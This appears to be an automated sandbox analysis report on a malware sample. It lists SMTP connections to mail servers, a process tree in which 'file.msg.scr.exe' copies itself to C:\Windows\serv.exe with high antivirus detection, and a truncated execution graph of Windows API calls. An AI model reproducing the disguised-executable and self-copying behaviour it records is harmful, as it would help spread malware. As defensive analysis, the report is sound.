                                                                  May 29, 2023 12:08:56.892046928 CEST254969467.195.204.79192.168.2.4220 mtaproxy212.free.mail.bf1.yahoo.com ESMTP ready
                                                                  May 29, 2023 12:08:57.187882900 CEST2549696104.47.18.161192.168.2.4220 AM7EUR06FT057.mail.protection.outlook.com Microsoft ESMTP MAIL Service ready at Mon, 29 May 2023 10:08:56 +0000
                                                                  May 29, 2023 12:09:07.537208080 CEST254969767.195.204.74192.168.2.4220 mtaproxy512.free.mail.bf1.yahoo.com ESMTP ready
                                                                  May 29, 2023 12:09:07.685729980 CEST2549699104.47.18.161192.168.2.4220 AM7EUR06FT036.mail.protection.outlook.com Microsoft ESMTP MAIL Service ready at Mon, 29 May 2023 10:09:07 +0000

                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:12:08:29
                                                                  Start date:29/05/2023
                                                                  Path:C:\Users\user\Desktop\file.msg.scr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\file.msg.scr.exe
                                                                  Imagebase:0x400000
                                                                  File size:520196 bytes
                                                                  MD5 hash:6B7ED3ABDD8484B313948BA83FDE717F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:2
                                                                  Start time:12:08:35
                                                                  Start date:29/05/2023
                                                                  Path:C:\Windows\serv.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\serv.exe s
                                                                  Imagebase:0x400000
                                                                  File size:520196 bytes
                                                                  MD5 hash:6B7ED3ABDD8484B313948BA83FDE717F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 86%, ReversingLabs
                                                                  Reputation:low

                                                                  Target ID:3
                                                                  Start time:12:08:35
                                                                  Start date:29/05/2023
                                                                  Path:C:\Windows\SysWOW64\notepad.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\System32\notepad.exe C:\Users\user\Desktop\19F3.tmp
                                                                  Imagebase:0xa90000
                                                                  File size:236032 bytes
                                                                  MD5 hash:D693F13FE3AA2010B854C4C60671B8E2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:4
                                                                  Start time:12:08:45
                                                                  Start date:29/05/2023
                                                                  Path:C:\Windows\explorer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                  Imagebase:0x7ff618f60000
                                                                  File size:3933184 bytes
                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:5
                                                                  Start time:12:08:55
                                                                  Start date:29/05/2023
                                                                  Path:C:\Windows\serv.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\serv.exe" s
                                                                  Imagebase:0x400000
                                                                  File size:520196 bytes
                                                                  MD5 hash:6B7ED3ABDD8484B313948BA83FDE717F
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Target ID:8
                                                                  Start time:12:08:57
                                                                  Start date:29/05/2023
                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7028 -s 1420
                                                                  Imagebase:0xe50000
                                                                  File size:434592 bytes
                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:10
                                                                  Start time:12:08:59
                                                                  Start date:29/05/2023
                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2748 -s 1556
                                                                  Imagebase:0xe50000
                                                                  File size:434592 bytes
                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Target ID:13
                                                                  Start time:12:09:08
                                                                  Start date:29/05/2023
                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5796 -s 1284
                                                                  Imagebase:0xe50000
                                                                  File size:434592 bytes
                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:1.9%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:10.2%
                                                                    Total number of Nodes:1464
                                                                    Total number of Limit Nodes:45
                                                                    execution_graph 16188 422c6f 16189 422c7b ___initmbctable _fast_error_exit 16188->16189 16190 422c87 GetVersionExA 16189->16190 16191 422ccf GetModuleHandleA 16190->16191 16192 422d0a 16191->16192 16213 424675 HeapCreate 16192->16213 16194 422d3d 16220 423d97 16194->16220 16196 422d4f 16238 42719c 16196->16238 16203 422d8e 16285 426da5 16203->16285 16210 422dd3 GetModuleHandleA 16212 413c60 16210->16212 16214 4246bf 16213->16214 16216 424695 16213->16216 16214->16194 16215 4246c2 16215->16194 16216->16215 16305 4246c6 RtlAllocateHeap 16216->16305 16219 4246b3 HeapDestroy 16219->16214 16307 4240a8 16220->16307 16223 423da0 16311 423bc2 16223->16311 16224 423da8 16227 423e26 FlsAlloc 16224->16227 16228 423dbb GetProcAddress GetProcAddress GetProcAddress GetProcAddress 16224->16228 16230 423e3b 16227->16230 16231 423e7c 16227->16231 16228->16227 16229 423dfe 16228->16229 16229->16227 16319 427472 16230->16319 16233 423bc2 37 API calls 16231->16233 16235 423e81 16233->16235 16234 423e49 16234->16231 16236 423e51 FlsSetValue 16234->16236 16235->16196 16236->16231 16237 423e62 GetCurrentThreadId 16236->16237 16237->16235 16239 422eeb __getbuf 34 API calls 16238->16239 16241 4271ab 16239->16241 16240 4271f1 GetStartupInfoA 16248 4272f4 16240->16248 16252 42720b 16240->16252 16241->16240 16244 422d68 GetCommandLineA 16241->16244 16242 427384 SetHandleCount 16242->16244 16243 427323 GetStdHandle 16245 427331 GetFileType 16243->16245 16243->16248 16255 42707a 16244->16255 16245->16248 16246 422eeb __getbuf 34 API calls 16246->16252 16247 42727c 16247->16248 16249 4272a2 GetFileType 16247->16249 16250 4272ad 16247->16250 16248->16242 16248->16243 16254 427348 16248->16254 16249->16247 16249->16250 16250->16244 16250->16247 16251 427a37 __lock GetProcAddress 16250->16251 16251->16250 16252->16246 16252->16247 16252->16248 16253 427a37 __lock GetProcAddress 16253->16254 16254->16244 16254->16248 16254->16253 16256 4270b5 16255->16256 16257 427096 GetEnvironmentStringsW 16255->16257 16259 42709e 16256->16259 16260 427145 16256->16260 16258 4270aa GetLastError 16257->16258 16257->16259 16258->16256 16262 4270d4 WideCharToMultiByte 16259->16262 16263 4270cc GetEnvironmentStringsW 16259->16263 16261 427151 GetEnvironmentStrings 16260->16261 16264 422d84 16260->16264 16261->16264 16265 42715d 16261->16265 16267 42713a FreeEnvironmentStringsW 16262->16267 16268 427108 16262->16268 16263->16262 16263->16264 16278 426fd8 16264->16278 16270 422eeb __getbuf 34 API calls 16265->16270 16267->16264 16269 422eeb __getbuf 34 API calls 16268->16269 16271 42710e 16269->16271 16277 427176 16270->16277 16271->16267 16272 427117 WideCharToMultiByte 16271->16272 16273 427131 16272->16273 16274 427128 16272->16274 16273->16267 16276 42275e ___free_lc_time 34 API calls 16274->16276 16275 42718c FreeEnvironmentStringsA 16275->16264 16276->16273 16277->16275 16279 426fea 16278->16279 16280 426fef GetModuleFileNameA 16278->16280 16495 4279f1 16279->16495 16282 427017 16280->16282 16283 422eeb __getbuf 34 API calls 16282->16283 16284 427042 16283->16284 16284->16203 16286 426db2 16285->16286 16288 426db7 _strlen 16285->16288 16287 4279f1 ___initmbctable 63 API calls 16286->16287 16287->16288 16289 422eeb __getbuf 34 API calls 16288->16289 16292 422d9f 16288->16292 16295 426de8 _strcat _strlen 16289->16295 16290 426e31 16291 42275e ___free_lc_time 34 API calls 16290->16291 16291->16292 16297 4253f0 16292->16297 16293 422eeb __getbuf 34 API calls 16293->16295 16294 426e56 16296 42275e ___free_lc_time 34 API calls 16294->16296 16295->16290 16295->16292 16295->16293 16295->16294 16296->16292 16299 4253f9 16297->16299 16300 422db2 GetStartupInfoA 16299->16300 16663 4228af 16299->16663 16301 426d48 16300->16301 16302 426d54 16301->16302 16304 426d59 __wincmdln 16301->16304 16303 4279f1 ___initmbctable 63 API calls 16302->16303 16303->16304 16304->16210 16306 4246ae 16305->16306 16306->16215 16306->16219 16308 4240b1 16307->16308 16310 423d9c 16308->16310 16326 427a37 16308->16326 16310->16223 16310->16224 16312 423bcc FlsFree 16311->16312 16316 423bda 16311->16316 16312->16316 16313 42410b RtlDeleteCriticalSection 16330 42275e 16313->16330 16314 424123 16317 424135 RtlDeleteCriticalSection 16314->16317 16318 423da5 16314->16318 16316->16313 16316->16314 16317->16314 16318->16196 16320 42747e __lock __getbuf ___initmbctable 16319->16320 16321 4274eb RtlAllocateHeap 16320->16321 16322 4241fb __lock 33 API calls 16320->16322 16323 427517 ___initmbctable 16320->16323 16324 424eed __getbuf 5 API calls 16320->16324 16491 42751c 16320->16491 16321->16320 16322->16320 16323->16234 16324->16320 16327 427a43 ___initmbctable 16326->16327 16328 427a79 ___initmbctable 16327->16328 16329 427a64 GetProcAddress 16327->16329 16328->16308 16329->16328 16332 42276a ___initmbctable 16330->16332 16331 4227c9 ___initmbctable 16331->16316 16332->16331 16339 4227a6 16332->16339 16340 4241fb 16332->16340 16333 4227bb HeapFree 16333->16331 16335 422781 ___free_lc_time 16336 42279b 16335->16336 16347 424739 16335->16347 16353 4227b1 16336->16353 16339->16331 16339->16333 16341 424221 RtlEnterCriticalSection 16340->16341 16342 42420e 16340->16342 16341->16335 16356 42415b 16342->16356 16344 424214 16344->16341 16377 422c26 16344->16377 16348 424776 16347->16348 16352 424a1c ___free_lc_time 16347->16352 16349 424962 VirtualFree 16348->16349 16348->16352 16350 4249c6 16349->16350 16351 4249d5 VirtualFree HeapFree 16350->16351 16350->16352 16351->16352 16352->16336 16490 424146 RtlLeaveCriticalSection 16353->16490 16355 4227b8 16355->16339 16357 424167 ___initmbctable 16356->16357 16358 42418a __lock ___initmbctable 16357->16358 16383 422eeb 16357->16383 16358->16344 16361 424192 16364 4241fb __lock 34 API calls 16361->16364 16362 424185 16386 426856 16362->16386 16365 424199 16364->16365 16366 4241a1 16365->16366 16367 4241d9 16365->16367 16369 427a37 __lock GetProcAddress 16366->16369 16368 42275e ___free_lc_time 34 API calls 16367->16368 16370 4241d5 16368->16370 16371 4241ac 16369->16371 16389 4241f2 16370->16389 16371->16370 16372 4241b2 16371->16372 16374 42275e ___free_lc_time 34 API calls 16372->16374 16375 4241b8 16374->16375 16376 426856 __lock 34 API calls 16375->16376 16376->16358 16378 422c34 16377->16378 16379 422c2f 16377->16379 16445 426a34 16378->16445 16439 426bab 16379->16439 16392 422ebf 16383->16392 16428 423bdf GetLastError FlsGetValue 16386->16428 16388 42685b 16388->16358 16438 424146 RtlLeaveCriticalSection 16389->16438 16391 4241f9 16391->16358 16393 422ee8 16392->16393 16395 422ec6 __getbuf 16392->16395 16393->16361 16393->16362 16395->16393 16396 422e44 16395->16396 16397 422e50 ___initmbctable 16396->16397 16398 422e83 16397->16398 16399 4241fb __lock 33 API calls 16397->16399 16400 422e9e RtlAllocateHeap 16398->16400 16401 422ead ___initmbctable 16398->16401 16402 422e6b 16399->16402 16400->16401 16401->16395 16406 424eed 16402->16406 16409 424f1f 16406->16409 16408 422e76 16412 422eb6 16408->16412 16409->16408 16411 425042 16409->16411 16415 424a51 16409->16415 16411->16408 16423 424b08 16411->16423 16427 424146 RtlLeaveCriticalSection 16412->16427 16414 422ebd 16414->16398 16416 424a63 RtlReAllocateHeap 16415->16416 16417 424a97 RtlAllocateHeap 16415->16417 16418 424a82 16416->16418 16419 424a86 16416->16419 16420 424ac2 VirtualAlloc 16417->16420 16421 424abe 16417->16421 16418->16411 16419->16417 16420->16421 16422 424adc HeapFree 16420->16422 16421->16411 16422->16421 16424 424b1d VirtualAlloc 16423->16424 16426 424b64 16424->16426 16426->16408 16427->16414 16429 423c44 SetLastError 16428->16429 16430 423bfb 16428->16430 16429->16388 16431 427472 __lock 29 API calls 16430->16431 16432 423c07 16431->16432 16433 423c0f FlsSetValue 16432->16433 16434 423c3c 16432->16434 16433->16434 16435 423c20 GetCurrentThreadId 16433->16435 16436 422c26 __lock 29 API calls 16434->16436 16435->16429 16437 423c43 16436->16437 16437->16429 16438->16391 16440 426bb5 16439->16440 16441 426a34 _fast_error_exit 34 API calls 16440->16441 16444 426be2 16440->16444 16442 426bcc 16441->16442 16443 426a34 _fast_error_exit 34 API calls 16442->16443 16443->16444 16444->16378 16447 426a5a 16445->16447 16446 426b67 _strlen 16451 426b7c GetStdHandle WriteFile 16446->16451 16447->16446 16449 426a99 16447->16449 16455 426b62 16447->16455 16452 426aa5 GetModuleFileNameA 16449->16452 16449->16455 16451->16455 16453 426abf _strcat _fast_error_exit _strncpy _strlen 16452->16453 16456 429202 16453->16456 16463 428381 16455->16463 16457 429215 LoadLibraryA 16456->16457 16461 429282 16456->16461 16458 42922a GetProcAddress 16457->16458 16457->16461 16459 429241 GetProcAddress GetProcAddress 16458->16459 16458->16461 16460 429264 GetProcAddress 16459->16460 16459->16461 16460->16461 16462 429275 GetProcAddress 16460->16462 16461->16455 16462->16461 16464 422c3d 16463->16464 16465 428350 ___initmbctable 16463->16465 16464->16341 16469 429c54 16465->16469 16470 429c63 ___initmbctable 16469->16470 16471 429cc5 GetModuleFileNameA 16470->16471 16476 429c76 16470->16476 16474 429cdf _strcat _fast_error_exit _strncpy _strlen 16471->16474 16475 429202 _fast_error_exit 6 API calls 16474->16475 16475->16476 16477 42552e 16476->16477 16480 42545a 16477->16480 16479 42553b 16481 425466 ___initmbctable 16480->16481 16482 4241fb __lock 32 API calls 16481->16482 16483 42546d 16482->16483 16484 42547e GetCurrentProcess TerminateProcess 16483->16484 16485 42548e _fast_error_exit 16483->16485 16484->16485 16486 425509 _fast_error_exit RtlLeaveCriticalSection 16485->16486 16487 4254f1 16486->16487 16488 425396 _fast_error_exit GetProcAddress ExitProcess 16487->16488 16489 425504 ___initmbctable 16487->16489 16488->16489 16489->16479 16490->16355 16494 424146 RtlLeaveCriticalSection 16491->16494 16493 427523 16493->16320 16494->16493 16496 4279fa 16495->16496 16497 427a01 16495->16497 16499 4278a1 16496->16499 16497->16280 16500 4278ad ___initmbctable 16499->16500 16501 4241fb __lock 34 API calls 16500->16501 16502 4278b8 16501->16502 16503 4278de 16502->16503 16504 4278cc GetOEMCP 16502->16504 16505 4278f5 16503->16505 16506 4278e3 GetACP 16503->16506 16504->16505 16507 4279d0 16505->16507 16509 427933 16505->16509 16510 422eeb __getbuf 34 API calls 16505->16510 16506->16505 16523 4279e8 16507->16523 16514 427945 16509->16514 16515 427711 16509->16515 16510->16509 16511 4279df ___initmbctable 16511->16497 16513 42275e ___free_lc_time 34 API calls 16513->16507 16514->16507 16514->16513 16516 42772f 16515->16516 16521 42775a ___initmbctable 16515->16521 16518 427746 GetCPInfo 16516->16518 16516->16521 16518->16521 16519 42788d 16520 428381 _fast_error_exit 34 API calls 16519->16520 16522 42789f 16520->16522 16521->16519 16526 427585 GetCPInfo 16521->16526 16522->16514 16662 424146 RtlLeaveCriticalSection 16523->16662 16525 4279ef 16525->16511 16527 427677 16526->16527 16530 4275b5 16526->16530 16532 428381 _fast_error_exit 34 API calls 16527->16532 16529 42762b 16559 42933f 16529->16559 16536 427ceb 16530->16536 16534 42770f 16532->16534 16533 42764f 16535 42933f ___initmbctable 59 API calls 16533->16535 16534->16519 16535->16527 16537 427cf7 ___initmbctable 16536->16537 16538 427d01 GetStringTypeW 16537->16538 16539 427d19 16537->16539 16538->16539 16540 427d21 GetLastError 16538->16540 16541 427e2e 16539->16541 16542 427d4c 16539->16542 16540->16539 16603 4298a2 GetLocaleInfoA 16541->16603 16544 427d68 MultiByteToWideChar 16542->16544 16546 427e28 ___initmbctable 16542->16546 16544->16546 16550 427d96 __lock _fast_error_exit 16544->16550 16546->16529 16547 427e7a GetStringTypeA 16547->16546 16549 427e93 16547->16549 16552 42275e ___free_lc_time 34 API calls 16549->16552 16553 427df4 MultiByteToWideChar 16550->16553 16554 427472 __lock 34 API calls 16550->16554 16551 427e6e 16551->16546 16551->16547 16552->16546 16555 427e0b GetStringTypeW 16553->16555 16556 427e1c 16553->16556 16557 427de5 16554->16557 16555->16556 16556->16546 16558 42275e ___free_lc_time 34 API calls 16556->16558 16557->16546 16557->16553 16558->16546 16560 42934b ___initmbctable 16559->16560 16561 429355 LCMapStringW 16560->16561 16562 429370 16560->16562 16561->16562 16563 429378 GetLastError 16561->16563 16564 4293c3 16562->16564 16565 429597 16562->16565 16563->16562 16566 4293e4 MultiByteToWideChar 16564->16566 16569 42958f ___initmbctable 16564->16569 16567 4298a2 ___initmbctable 48 API calls 16565->16567 16566->16569 16573 429412 _fast_error_exit 16566->16573 16568 4295c1 16567->16568 16568->16569 16570 4295da 16568->16570 16571 4296c8 LCMapStringA 16568->16571 16569->16533 16572 4298e5 ___initmbctable 41 API calls 16570->16572 16574 4296c5 16571->16574 16575 4295ec 16572->16575 16576 429471 MultiByteToWideChar 16573->16576 16578 422eeb __getbuf 34 API calls 16573->16578 16574->16569 16581 42275e ___free_lc_time 34 API calls 16574->16581 16575->16569 16577 4295f6 LCMapStringA 16575->16577 16579 429574 16576->16579 16580 42948e LCMapStringW 16576->16580 16582 429690 16577->16582 16596 429615 __lock _fast_error_exit 16577->16596 16583 42945e 16578->16583 16585 429581 16579->16585 16587 42275e ___free_lc_time 34 API calls 16579->16587 16580->16579 16584 4294ad 16580->16584 16581->16569 16582->16574 16589 42275e ___free_lc_time 34 API calls 16582->16589 16583->16569 16583->16576 16586 4294b3 16584->16586 16591 4294e0 _fast_error_exit 16584->16591 16585->16569 16588 42275e ___free_lc_time 34 API calls 16585->16588 16586->16579 16590 4294c5 LCMapStringW 16586->16590 16587->16585 16588->16569 16589->16574 16590->16579 16592 42953b LCMapStringW 16591->16592 16593 422eeb __getbuf 34 API calls 16591->16593 16592->16579 16594 429553 WideCharToMultiByte 16592->16594 16598 42952c 16593->16598 16594->16579 16595 429673 LCMapStringA 16595->16582 16597 429694 16595->16597 16596->16595 16599 422eeb __getbuf 34 API calls 16596->16599 16600 4298e5 ___initmbctable 41 API calls 16597->16600 16598->16579 16598->16592 16602 429658 __lock 16599->16602 16600->16582 16602->16582 16602->16595 16604 4298d1 16603->16604 16605 4298cc 16603->16605 16635 422b9e 16604->16635 16607 428381 _fast_error_exit 34 API calls 16605->16607 16608 427e4e 16607->16608 16608->16546 16608->16547 16609 4298e5 16608->16609 16610 4298f1 ___initmbctable 16609->16610 16611 429918 GetCPInfo 16610->16611 16627 429a28 16610->16627 16612 429929 16611->16612 16619 42993c _strlen 16611->16619 16614 42992f GetCPInfo 16612->16614 16612->16619 16613 4299e2 16618 428381 _fast_error_exit 34 API calls 16613->16618 16614->16619 16615 42275e ___free_lc_time 34 API calls 16615->16613 16616 429970 MultiByteToWideChar 16616->16613 16617 42998a __lock _fast_error_exit 16616->16617 16621 4299f0 MultiByteToWideChar 16617->16621 16623 427472 __lock 34 API calls 16617->16623 16620 429aa8 ___initmbctable 16618->16620 16619->16616 16619->16617 16620->16551 16622 429a0b 16621->16622 16621->16627 16624 429a30 16622->16624 16625 429a10 WideCharToMultiByte 16622->16625 16626 4299da 16623->16626 16628 429a35 WideCharToMultiByte 16624->16628 16629 429a4b 16624->16629 16625->16627 16626->16613 16626->16621 16627->16613 16627->16615 16628->16627 16628->16629 16630 427472 __lock 34 API calls 16629->16630 16631 429a53 16630->16631 16631->16627 16632 429a5c WideCharToMultiByte 16631->16632 16632->16627 16633 429a70 16632->16633 16634 42275e ___free_lc_time 34 API calls 16633->16634 16634->16627 16636 423bdf __lock 34 API calls 16635->16636 16637 422ba5 16636->16637 16640 422bb5 16637->16640 16642 424620 16637->16642 16641 422be3 16640->16641 16650 424418 16640->16650 16641->16605 16643 42462c ___initmbctable 16642->16643 16644 4241fb __lock 34 API calls 16643->16644 16645 424633 16644->16645 16654 42455f 16645->16654 16649 424649 ___initmbctable 16649->16640 16651 424436 16650->16651 16653 42442d 16650->16653 16652 427ceb ___initmbctable 48 API calls 16651->16652 16652->16653 16653->16640 16655 423bdf __lock 34 API calls 16654->16655 16657 424565 16655->16657 16656 42461a 16659 424652 16656->16659 16657->16656 16658 42448f ___initmbctable 34 API calls 16657->16658 16658->16656 16660 424146 ctype RtlLeaveCriticalSection 16659->16660 16661 424659 16660->16661 16661->16649 16662->16525 16666 422877 16663->16666 16665 4228b8 16665->16300 16667 422883 ___initmbctable 16666->16667 16674 4253c6 16667->16674 16673 4228a0 ___initmbctable 16673->16665 16675 4241fb __lock 34 API calls 16674->16675 16676 422888 16675->16676 16677 4227cf 16676->16677 16687 42555d 16677->16687 16679 4227db 16682 42281d 16679->16682 16695 4251e9 16679->16695 16681 422808 16681->16682 16683 4251e9 37 API calls 16681->16683 16684 4228a9 16682->16684 16683->16682 16721 4253cf 16684->16721 16688 425569 ___initmbctable 16687->16688 16689 4255ac RtlSizeHeap 16688->16689 16690 4241fb __lock 34 API calls 16688->16690 16691 4255bf ___initmbctable 16689->16691 16692 425579 ___free_lc_time 16690->16692 16691->16679 16713 4255ca 16692->16713 16696 4251f5 ___initmbctable 16695->16696 16697 4251fe 16696->16697 16698 42520c 16696->16698 16699 422eeb __getbuf 34 API calls 16697->16699 16700 425213 16698->16700 16701 42521f 16698->16701 16703 425206 ___initmbctable 16699->16703 16702 42275e ___free_lc_time 34 API calls 16700->16702 16706 42535a __getbuf 16701->16706 16712 42522c __getbuf ___sbh_resize_block ___free_lc_time 16701->16712 16702->16703 16703->16681 16704 425368 RtlReAllocateHeap 16704->16706 16705 4241fb __lock 34 API calls 16705->16712 16706->16703 16706->16704 16708 4252b8 RtlAllocateHeap 16708->16712 16709 42530e RtlReAllocateHeap 16709->16712 16710 424eed __getbuf 5 API calls 16710->16712 16711 424739 VirtualFree VirtualFree HeapFree ___free_lc_time 16711->16712 16712->16703 16712->16705 16712->16708 16712->16709 16712->16710 16712->16711 16717 425351 16712->16717 16716 424146 RtlLeaveCriticalSection 16713->16716 16715 4255a6 16715->16689 16715->16691 16716->16715 16720 424146 RtlLeaveCriticalSection 16717->16720 16719 425358 16719->16712 16720->16719 16724 424146 RtlLeaveCriticalSection 16721->16724 16723 4228ae 16723->16673 16724->16723 16725 41b070 16726 41b0e2 CreateProcessA 16725->16726 16727 41b07c 16725->16727 16729 41a600 2 API calls 16727->16729 16730 41b0da 16729->16730 16730->16726 16731 41b470 16732 41b4cb WriteFile 16731->16732 16733 41b47c 16731->16733 16735 41a600 2 API calls 16733->16735 16736 41b4c3 16735->16736 16736->16732 16773 420970 16774 420984 16773->16774 16775 42097d 16773->16775 16794 41f4c0 16774->16794 16791 4209cb 16960 41f040 16791->16960 16795 41f560 16794->16795 16979 41ac50 16795->16979 16799 41f629 16989 41c690 16799->16989 16801 41f66b 16802 41f674 16801->16802 16995 41b8e0 16801->16995 16999 41c720 16802->16999 16806 41b8e0 2 API calls 16813 41f6a0 16806->16813 16808 41f71f 17033 41eec0 16808->17033 16810 41f72f 16811 41ac50 2 API calls 16810->16811 16812 41f73a 16811->16812 17049 41ad50 16812->17049 17003 41edb0 16813->17003 16815 41f740 17055 41c870 16815->17055 16818 41f760 16819 41f890 16818->16819 16820 41ac50 2 API calls 16819->16820 16821 41f980 16820->16821 16822 41acd0 3 API calls 16821->16822 16823 41f986 16822->16823 16824 41c690 5 API calls 16823->16824 16825 41f9b9 16824->16825 16826 41f9c2 16825->16826 16827 41b8e0 2 API calls 16825->16827 16828 41c720 4 API calls 16826->16828 16827->16826 16829 41f9fc 16828->16829 16830 41b8e0 2 API calls 16829->16830 16837 41fa05 16829->16837 16830->16837 16831 41edb0 6 API calls 16832 41fad3 16831->16832 16833 41eec0 3 API calls 16832->16833 16834 41fae3 16833->16834 16835 41ac50 2 API calls 16834->16835 16836 41faff 16835->16836 16838 41ad50 3 API calls 16836->16838 16837->16831 16839 41fb05 16838->16839 16840 41c870 4 API calls 16839->16840 16841 41fb0f 16840->16841 16842 41fb20 16841->16842 16843 41fb90 16842->16843 16845 41fc07 16843->16845 17093 41ed40 16843->17093 16852 41fc20 16845->16852 16846 41fbcd 16847 41ed40 6 API calls 16846->16847 16848 41fbe2 16847->16848 16849 41edb0 6 API calls 16848->16849 16850 41fbf2 16849->16850 16851 41edb0 6 API calls 16850->16851 16851->16845 16853 41fcd0 16852->16853 16854 41ac50 2 API calls 16853->16854 16855 4200b1 16854->16855 16856 41acd0 3 API calls 16855->16856 16857 4200b7 16856->16857 16858 41c690 5 API calls 16857->16858 16859 4200ed 16858->16859 16860 4200f6 16859->16860 16861 41b8e0 2 API calls 16859->16861 16862 41c720 4 API calls 16860->16862 16861->16860 16863 42011b 16862->16863 16864 420124 16863->16864 16865 41b8e0 2 API calls 16863->16865 16866 41c870 4 API calls 16864->16866 16865->16864 16867 420141 16866->16867 16868 41c690 5 API calls 16867->16868 16869 42015c 16868->16869 16870 420165 16869->16870 16871 41b8e0 2 API calls 16869->16871 16872 41c720 4 API calls 16870->16872 16871->16870 16873 42018a 16872->16873 16874 41b8e0 2 API calls 16873->16874 16875 420198 16873->16875 16874->16875 16876 41edb0 6 API calls 16875->16876 16877 4201df 16876->16877 16878 41eec0 3 API calls 16877->16878 16879 4201ef 16878->16879 16880 41ac50 2 API calls 16879->16880 16881 4201fd 16880->16881 16882 41ad50 3 API calls 16881->16882 16883 420203 16882->16883 16884 41c870 4 API calls 16883->16884 16885 42020d 16884->16885 16886 420220 16885->16886 16887 4202d4 16886->16887 16888 41ac50 2 API calls 16887->16888 16889 4203d4 16888->16889 16890 41acd0 3 API calls 16889->16890 16891 4203da 16890->16891 16892 41c690 5 API calls 16891->16892 16893 4203f4 16892->16893 16894 4203fd 16893->16894 16895 41b8e0 2 API calls 16893->16895 16896 41edb0 6 API calls 16894->16896 16895->16894 16897 420441 16896->16897 16898 41eec0 3 API calls 16897->16898 16899 420454 16898->16899 16900 41ac50 2 API calls 16899->16900 16901 420462 16900->16901 16902 41ad50 3 API calls 16901->16902 16903 420468 16902->16903 16904 41c870 4 API calls 16903->16904 16905 420472 16904->16905 16906 420480 16905->16906 16907 420547 16906->16907 16908 41ac50 2 API calls 16907->16908 16909 420601 16908->16909 16910 41acd0 3 API calls 16909->16910 16911 420607 16910->16911 16912 41c690 5 API calls 16911->16912 16913 42064e 16912->16913 16914 420658 16913->16914 16915 41b8e0 2 API calls 16913->16915 16916 41c720 4 API calls 16914->16916 16915->16914 16917 42067a 16916->16917 16918 41b8e0 2 API calls 16917->16918 16925 420683 16917->16925 16918->16925 16919 41edb0 6 API calls 16920 420717 16919->16920 16921 41eec0 3 API calls 16920->16921 16922 42072a 16921->16922 16923 41ac50 2 API calls 16922->16923 16924 420738 16923->16924 16926 41ad50 3 API calls 16924->16926 16925->16919 16927 42073e 16926->16927 16928 41c870 4 API calls 16927->16928 16929 420748 16928->16929 16930 420760 16929->16930 16931 4207e1 16930->16931 16931->16931 16932 41ac50 2 API calls 16931->16932 16933 42085d 16932->16933 16934 41acd0 3 API calls 16933->16934 16935 420863 16934->16935 16936 41c690 5 API calls 16935->16936 16937 42087d 16936->16937 16938 420886 16937->16938 16939 41b8e0 2 API calls 16937->16939 16940 41c720 4 API calls 16938->16940 16939->16938 16941 4208a8 16940->16941 16942 41b8e0 2 API calls 16941->16942 16948 4208b1 16941->16948 16942->16948 16943 41edb0 6 API calls 16944 420945 16943->16944 16945 41ac50 2 API calls 16944->16945 16946 420953 16945->16946 16947 41ad50 3 API calls 16946->16947 16949 420959 16947->16949 16948->16943 16950 41c870 4 API calls 16949->16950 16951 420963 16950->16951 16952 41f2b0 16951->16952 16953 41f321 16952->16953 16953->16953 16954 41f350 LoadLibraryA 16953->16954 16956 41f33b 16953->16956 16955 41f365 GetProcAddress 16954->16955 16954->16956 16955->16956 16957 41f383 16955->16957 16956->16791 17112 41e780 16957->17112 16961 41f096 16960->16961 16962 41ac50 2 API calls 16961->16962 16963 41f177 16962->16963 16964 41acd0 3 API calls 16963->16964 16965 41f17d GetSystemDirectoryA 16964->16965 16966 41f1a3 16965->16966 16967 41f289 16966->16967 16969 41f239 16966->16969 16971 41a7a0 2 API calls 16966->16971 16968 41ac50 2 API calls 16967->16968 16970 41f291 16968->16970 16969->16967 17126 41b070 16969->17126 16972 41ad50 3 API calls 16970->16972 16971->16969 16974 41f297 16972->16974 16975 41f267 16975->16967 16976 41a8e0 3 API calls 16975->16976 16977 41f27f 16976->16977 16978 41a8e0 3 API calls 16977->16978 16978->16967 16980 41acba 16979->16980 16981 41ac5c 16979->16981 16983 41acd0 16980->16983 16982 41a600 2 API calls 16981->16982 16982->16980 16984 